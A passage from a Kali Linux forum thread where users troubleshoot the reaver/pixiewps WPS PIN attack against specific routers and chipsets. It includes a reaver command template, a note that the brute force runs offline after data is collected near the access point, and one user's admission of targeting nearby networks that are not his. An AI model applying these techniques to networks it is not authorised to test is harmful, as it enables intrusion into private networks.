    First I saw t6x's post above somewhere in this thread and thought I could find some useful information about it because the chipset he mentioned and mine are the same.

    Quote Originally Posted by kcdtv View Post
    bro', i am not judging you or telling you what to do or not.
    My point of view is not moral, i am not administrator or moderator of this forum and i really don't care about what you do at your home, that's not my business and i am not a cop, **** no!
    The point is that if you are not in good conditions with a real knowledge about the configuration of the access point ... if you get "error code 04 wps transaction failed" or something like this there could be so much reasons... from interferences made by other clients associated to the RXQ you get, you don't even know if WPS is properly enabled,
    So "experts" will tell you to get closer to access point, to disconnect all devices when you make your test, to rise delay between PIN...
    I can give you an example : Spanish livebox 2.1 will let you send a PIN just if you are very very close to the access point with delay 5 and will handle one PIN out 5, It is not a defense mechanism or something like that, just the way wps is implemented (badly)
    while you could PIN brute force fast as **** other devices in bad conditions that would not even allow you to reach 1MBpS when you connect to them in the same conditions...
    So if yo are on "spanish livebox 2.1" kind of router, there is nothing yo can do, no bug, and nothing to tell you... when i see this default ssid i imagine one of this crappy "box" with so little range that i can easily imagine why you cannot "reaver" it if you are more than 10 meters away from the device..
    Anyway, you are not giving enough elements to answer you... scan with airodmp-ng should be done with --bssid filter and --channel filter, we should see the output of your probes to get info about the device, we should get an exact stdout of what is going on with reaver.
    I tried reaver on my router by sitting just right next to it and it was the same. Same error 0x04. My knowledge about this whole kali is so shallow but I am very interested in it. But it's kind of sad there is so few are to tell. I could try giving every info needed.

    Quote Originally Posted by kcdtv View Post
    If this topic is about pixiewps : Do you think it is respectful for wiire who made this tool for all of us to use his thread to ask whatever yo want? If everybody does like you, what would be the result?

    You know .. be honnest with your girl (or boy), be honest with your bro' and mum...but with the rest.. be clever.
    Saying in a public forum that you are "hacking" network and uploading pictures with full bssid and essid of this networks is not clever.
    That why i recommend you to "edit" your pictures by erasing the end of bssid and essid... because doing like yo do is like declaring to the whole world "here i am! Check this macs and essid; i live 25 meters aways!"
    Well, my point is: Please, reconsider the way you act in this thread, i think it is a shame to "deviate" it and this forum is full of shity and useless themes that you could use to ask questions. But the work from wiire and this thread is without any doubt one of the best and more usefull in this whole forum, please, respect it and help to respect it.
    take care
    I understood everything so clear that you could see adele rolling from 1000 meters away. And yes, I have done a bad thing regarding morality literally. I do have respect for those who are modifying and developing for nothing, too. I actually have almost nothing to say as defense and you got me real good. But also please try to understand and consider what I am mentioning since we are in the bucket.

  36. #236
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    The same chipset doesn't mean anything. It's like saying my car has the same motor as you, why doesn't it work? Every system may be configured differently, slightly different parts, different firmware, different implementations, perhaps they are not using the reference code supplied by the chip manufacturer. There are a plethora of possible solutions to your answer, and without the proper information we can't help. We need to know the model of the AP, chipset, manufacturer, if WPS is configured or not, and if you want to really get into it, it is best if you have administrator access so we can see the configuration of it and make an assessment from there.

  37. #237
    Join Date
    2016-May
    Posts
    1
    Dear any Solution for this issue of RTL8671? I am still waiting any update for This stupid model RTL8671.

  38. #238
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    No. There will be an update if it is supported, no need to keep asking.

  39. #239
    Join Date
    2017-Jan
    Posts
    7
    you said it is an offline attack right ?
    so does this mean i can bruteforce when i am far from AP ?
    if i have all those parameter values.. ?

  40. #240
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Yes it is offline. Yes you can bruteforce when you are far from the AP, but you need to have all the information gathered from it first, meaning you have to be near it at some point to get it.

  41. #241
    Join Date
    2016-Sep
    Posts
    8
    Got the wps pin using "reaver -i wlan0mon -b (insert bssid here) -vvv -W 2 (it is a belkin router) -a -c (insert channel number here), tried to get the passwd using the --pin= option in reaver and it gives me a hash looking thing for the passwd. I still couldn't use that "hash" to connect to the network. I tried to disconnect all AP's from the client as well as changing my mac address to one of the AP's connected on the network, still no success. However, I couldn't help but notice that each time I tried with the passwd I got from pixie, it got NACS errors but every time I tried with a different wps pin than the correct one, it tests it and reports that it didn't work. Kinda stuck here. Some information: WPA and WPS (no WPA2), Belkin chipset, WPS is not locked and is, according to the command "wash -i wlan0mon" at a version 1.0 and it does send out beacons frequently. I'm not very far away from the router, according to the wash command, -59. I just want to learn why this is happening and explore.

  42. #242
    Rtl8671 and linksys e900 is there any way to crack wps pin of above chipset??

  43. #243
    Join Date
    2013-Jul
    Location
    Australia
    Posts
    2
    Quote Originally Posted by RAZERZDAHACKER View Post
    Got the wps pin using "reaver -i wlan0mon -b (insert bssid here) -vvv -W 2 (it is a belkin router) -a -c (insert channel number here), tried to get the passwd using the --pin= option in reaver and it gives me a hash looking thing for the passwd. I still couldn't use that "hash" to connect to the network. I tried to disconnect all AP's from the client as well as changing my mac address to one of the AP's connected on the network, still no success. However, I couldn't help but notice that each time I tried with the passwd I got from pixie, it got NACS errors but every time I tried with a different wps pin than the correct one, it tests it and reports that it didn't work. Kinda stuck here. Some information: WPA and WPS (no WPA2), Belkin chipset, WPS is not locked and is, according to the command "wash -i wlan0mon" at a version 1.0 and it does send out beacons frequently. I'm not very far away from the router, according to the wash command, -59. I just want to learn why this is happening and explore.
    It didnt work for me at all 0.00

  44. #244
    Join Date
    2015-Mar
    Posts
    54
    We started a new thread for collecting data: https://forums.kali.org/showthread.p...ll=1#post75368

Similar Threads

  1. Data gathering for pixiewps (pixie dust attack)
    By wiire in forum Community Projects
    Replies: 14
    Last Post: 1 Week Ago, 12:54
  2. WPS Pixie Dust Attack (Offline WPS Attack)
    By soxrok2212 in forum General Archive
    Replies: 353
    Last Post: 2015-05-05, 08:32
  3. Pixiewps: wps pixie dust attack tool
    By wiire in forum General Archive
    Replies: 89
    Last Post: 2015-05-04, 19:32

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •